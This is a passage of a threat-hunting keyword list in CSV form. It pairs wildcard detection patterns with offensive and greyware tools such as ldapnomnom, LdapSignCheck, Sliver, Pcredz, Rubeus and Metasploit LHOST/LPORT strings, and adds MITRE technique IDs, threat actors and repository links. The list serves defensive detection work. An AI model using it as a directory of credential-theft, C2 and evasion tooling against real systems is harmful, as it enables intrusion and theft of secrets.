Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*ldapdomaindump*,offensive_tool_keyword,ldapdomaindump,Active Directory information dumper via LDAP,T1087 - T1005 - T1016,TA0007,N/A,N/A,Credential Access,https://github.com/dirkjanm/ldapdomaindump,1,1,N/A,N/A,10,970,176,2023-09-06T05:50:30Z,2016-05-24T18:46:56Z -*LDAPDomainDump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*ldapfilter:*admincount=1* /format:hashcat*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*LdapMiner*,offensive_tool_keyword,ldapminer,This is a tool I wrote to collect information from different LDAP Server implementation. This was written in C with the Netscape C,T1016 - T1018 - T1021 - T1046 - T1056 - T1069 - T1078 - T1087 - T1114 - T1482 - T1526 - T1597,TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Information Gathering,https://sourceforge.net/projects/ldapminer/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ldapnomnom --input*,offensive_tool_keyword,ldapnomnom,Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP),T1110.003 - T1205,TA0001 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/lkarlslund/ldapnomnom,1,0,N/A,N/A,7,697,60,2023-03-31T16:18:14Z,2022-09-18T10:35:09Z -*ldapnomnom*,offensive_tool_keyword,ldapnomnom,Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP),T1110.003 - T1205,TA0001 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/lkarlslund/ldapnomnom,1,1,N/A,N/A,7,697,60,2023-03-31T16:18:14Z,2022-09-18T10:35:09Z -*ldapnomnom-darwin-*,offensive_tool_keyword,ldapnomnom,Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP),T1110.003 - T1205,TA0001 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/lkarlslund/ldapnomnom,1,1,N/A,N/A,7,697,60,2023-03-31T16:18:14Z,2022-09-18T10:35:09Z -*ldapnomnom-linux-*,offensive_tool_keyword,ldapnomnom,Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP),T1110.003 - T1205,TA0001 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/lkarlslund/ldapnomnom,1,1,N/A,N/A,7,697,60,2023-03-31T16:18:14Z,2022-09-18T10:35:09Z -*ldapnomnom-main*,offensive_tool_keyword,ldapnomnom,Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP),T1110.003 - T1205,TA0001 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/lkarlslund/ldapnomnom,1,1,N/A,N/A,7,697,60,2023-03-31T16:18:14Z,2022-09-18T10:35:09Z -*ldapnomnom-windows-386.exe*,offensive_tool_keyword,ldapnomnom,Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP),T1110.003 - T1205,TA0001 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/lkarlslund/ldapnomnom,1,1,N/A,N/A,7,697,60,2023-03-31T16:18:14Z,2022-09-18T10:35:09Z -*ldapnomnom-windows-amd64.exe*,offensive_tool_keyword,ldapnomnom,Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP),T1110.003 - T1205,TA0001 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/lkarlslund/ldapnomnom,1,1,N/A,N/A,7,697,60,2023-03-31T16:18:14Z,2022-09-18T10:35:09Z -*ldapnomnom-windows-arm64.exe*,offensive_tool_keyword,ldapnomnom,Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP),T1110.003 - T1205,TA0001 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/lkarlslund/ldapnomnom,1,1,N/A,N/A,7,697,60,2023-03-31T16:18:14Z,2022-09-18T10:35:09Z -*LDAP-Password-Hunter*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/oldboy21/LDAP-Password-Hunter,1,1,N/A,10,2,189,27,2023-01-06T15:32:34Z,2021-07-26T14:27:01Z -*ldaprelayclient.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*ldaprelayclient.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*LdapRelayScan.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*LdapRelayScan.py*,offensive_tool_keyword,LdapRelayScan,Check for LDAP protections regarding the relay of NTLM authentication,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/zyn3rgy/LdapRelayScan,1,1,N/A,N/A,4,389,51,2023-09-04T05:43:00Z,2022-01-16T06:50:44Z -*LdapRelayScan-main*,offensive_tool_keyword,LdapRelayScan,Check for LDAP protections regarding the relay of NTLM authentication,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/zyn3rgy/LdapRelayScan,1,1,N/A,8,4,389,51,2023-09-04T05:43:00Z,2022-01-16T06:50:44Z -*ldapsearch * ldap://*,greyware_tool_keyword,ldapsearch,ldapsearch to enumerate ldap,T1018 - T1087 - T1069,TA0007 - TA0002 - TA0008,N/A,N/A,Reconnaissance,https://man7.org/linux/man-pages/man1/ldapsearch.1.html,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*ldapsearch -x -h * -s base*,greyware_tool_keyword,ldapsearch,ldapsearch to enumerate ldap,T1018 - T1087 - T1069,TA0007 - TA0002 - TA0008,N/A,N/A,Reconnaissance,https://man7.org/linux/man-pages/man1/ldapsearch.1.html,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*ldapsearchad.py*,offensive_tool_keyword,ldapsearch-ad,Python3 script to quickly get various information from a domain controller through his LDAP service.,T1018 - T1087 - T1069,TA0007 - TA0002 - TA0008,N/A,N/A,Reconnaissance,https://github.com/yaap7/ldapsearch-ad,1,1,N/A,N/A,2,123,26,2023-05-10T13:30:16Z,2019-12-08T00:25:57Z -*ldapsearch-ad.py*,offensive_tool_keyword,ldapsearch-ad,Python3 script to quickly get various information from a domain controller through his LDAP service.,T1018 - T1087 - T1069,TA0007 - TA0002 - TA0008,N/A,N/A,Reconnaissance,https://github.com/yaap7/ldapsearch-ad,1,1,N/A,N/A,2,123,26,2023-05-10T13:30:16Z,2019-12-08T00:25:57Z -*ldap-searcher *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*ldapsentinel * raw *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*ldapsentinel forest user*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*LdapSignCheck.exe*,offensive_tool_keyword,cobaltstrike,Beacon Object File & C# project to check LDAP signing,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cube0x0/LdapSignCheck,1,1,N/A,10,10,148,22,2022-10-25T13:36:43Z,2022-02-24T20:25:31Z -*LdapSignCheck.Natives*,offensive_tool_keyword,cobaltstrike,Beacon Object File & C# project to check LDAP signing,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cube0x0/LdapSignCheck,1,1,N/A,10,10,148,22,2022-10-25T13:36:43Z,2022-02-24T20:25:31Z -*LdapSignCheck.sln*,offensive_tool_keyword,cobaltstrike,Beacon Object File & C# project to check LDAP signing,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cube0x0/LdapSignCheck,1,1,N/A,10,10,148,22,2022-10-25T13:36:43Z,2022-02-24T20:25:31Z -*ldapsigncheck.x64.*,offensive_tool_keyword,cobaltstrike,Beacon Object File & C# project to check LDAP signing,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cube0x0/LdapSignCheck,1,1,N/A,10,10,148,22,2022-10-25T13:36:43Z,2022-02-24T20:25:31Z -*ldapsigncheck.x86.*,offensive_tool_keyword,cobaltstrike,Beacon Object File & C# project to check LDAP signing,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cube0x0/LdapSignCheck,1,1,N/A,10,10,148,22,2022-10-25T13:36:43Z,2022-02-24T20:25:31Z -*LDAPWordlistHarvester.ps1*,offensive_tool_keyword,LDAPWordlistHarvester,A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.,T1210.001 - T1087.003 - T1110,TA0001 - TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/p0dalirius/LDAPWordlistHarvester,1,1,N/A,5,3,218,14,2023-10-01T21:12:10Z,2023-09-22T10:10:10Z -*LDAPWordlistHarvester.py*,offensive_tool_keyword,LDAPWordlistHarvester,A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.,T1210.001 - T1087.003 - T1110,TA0001 - TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/p0dalirius/LDAPWordlistHarvester,1,1,N/A,5,3,218,14,2023-10-01T21:12:10Z,2023-09-22T10:10:10Z -*LDAPWordlistHarvester-main*,offensive_tool_keyword,LDAPWordlistHarvester,A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.,T1210.001 - T1087.003 - T1110,TA0001 - TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/p0dalirius/LDAPWordlistHarvester,1,1,N/A,5,3,218,14,2023-10-01T21:12:10Z,2023-09-22T10:10:10Z -*ldd2bloodhound*,offensive_tool_keyword,ldapdomaindump,Active Directory information dumper via LDAP,T1087 - T1005 - T1016,TA0007,N/A,N/A,Credential Access,https://github.com/dirkjanm/ldapdomaindump,1,1,N/A,N/A,10,970,176,2023-09-06T05:50:30Z,2016-05-24T18:46:56Z -*ldeep cache *,offensive_tool_keyword,ldeep,In-depth ldap enumeration utility,T1589 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/franc-pentest/ldeep,1,0,N/A,N/A,3,219,26,2023-10-02T20:36:02Z,2018-10-22T18:21:44Z -*ldeep ldap -u *,offensive_tool_keyword,ldeep,In-depth ldap enumeration utility,T1589 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/franc-pentest/ldeep,1,0,N/A,N/A,3,219,26,2023-10-02T20:36:02Z,2018-10-22T18:21:44Z -*ldeep*activedirectory.py*,offensive_tool_keyword,ldeep,In-depth ldap enumeration utility,T1589 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/franc-pentest/ldeep,1,1,N/A,N/A,3,219,26,2023-10-02T20:36:02Z,2018-10-22T18:21:44Z -*ldeep*ldap_activedirectory.py*,offensive_tool_keyword,ldeep,In-depth ldap enumeration utility,T1589 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/franc-pentest/ldeep,1,1,N/A,N/A,3,219,26,2023-10-02T20:36:02Z,2018-10-22T18:21:44Z -*ldeep_dump_users_enabled.json,offensive_tool_keyword,ldeep,In-depth ldap enumeration utility,T1589 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/franc-pentest/ldeep,1,1,N/A,N/A,3,219,26,2023-10-02T20:36:02Z,2018-10-22T18:21:44Z -*ldeep_dump_users_enabled.lst,offensive_tool_keyword,ldeep,In-depth ldap enumeration utility,T1589 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/franc-pentest/ldeep,1,1,N/A,N/A,3,219,26,2023-10-02T20:36:02Z,2018-10-22T18:21:44Z -*ldeep_enum*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*ldif2john.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*ldifde.exe -f *\temp\*.txt -p subtree*,greyware_tool_keyword,ldifde,using ldifde.exe to export data from Active Directory to a .txt file in the Temp directory,T1018 - T1005 - T1077.001,TA0007 - TA0005 - TA0002,N/A,Volt Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*leaky/leakbuf.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*leapsecurity*,offensive_tool_keyword,Github Username,github repo name hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/leapsecurity,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*legalhackers.com/exploits/CVE*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*lejgfmmlngaigdmmikblappdafcmkndb*,greyware_tool_keyword,uVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*lem0nSec/ShellGhost*,offensive_tool_keyword,ShellGhost,A memory-based evasion technique which makes shellcode invisible from process start to end,T1055.012 - T1027.002 - T1055.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/lem0nSec/ShellGhost,1,1,N/A,N/A,9,892,102,2023-07-24T12:22:32Z,2023-07-01T16:56:58Z -*lengjibo/FourEye*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,1,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -*Leo4j/Invoke-SMBRemoting*,offensive_tool_keyword,Invoke-SMBRemoting,Interactive Shell and Command Execution over Named-Pipes (SMB),T1059 - T1021.002 - T1572,TA0002 - TA0008 - TA0011,N/A,N/A,Lateral Movement,https://github.com/Leo4j/Invoke-SMBRemoting,1,1,N/A,9,1,22,4,2023-10-02T10:21:34Z,2023-09-06T16:00:47Z -*LetMeOutSharp.*,offensive_tool_keyword,cobaltstrike,Project to enumerate proxy configurations and generate shellcode from CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/AggressiveProxy,1,1,N/A,10,10,139,26,2020-11-04T16:08:11Z,2020-11-04T12:53:00Z -*LFI scanner checks.jar*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,0,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*lgandx/Pcredz*,offensive_tool_keyword,Pcredz,This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.,T1116 - T1003 - T1002 - T1001 - T1005 - T1552,TA0003 - TA0002 - TA0011,N/A,N/A,Credential Access,https://github.com/lgandx/Pcredz,1,1,N/A,N/A,10,1771,383,2022-11-07T14:15:02Z,2014-04-07T02:03:33Z -*LHOST=* LPORT=*,offensive_tool_keyword,metasploit,metasploit command lines patterns,T1573.002 - T1043 - T1021,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation Tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*LHOST=0.tcp.ngrok.io*,greyware_tool_keyword,ngrok,ngrok - abused by attackers for C2 usage,T1090 - T1095 - T1008,TA0011 - TA0002 - TA0004,N/A,N/A,C2,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*liamg/traitor*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,1,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*lib/Bruteforcer.cs*,offensive_tool_keyword,KRBUACBypass,UAC Bypass By Abusing Kerberos Tickets,T1548.002 - T1558 - T1558.003,TA0004 - TA0006,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/KRBUACBypass,1,1,N/A,8,5,402,52,2023-08-10T02:51:59Z,2023-07-27T12:08:12Z -*lib/ForgeTicket.*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE 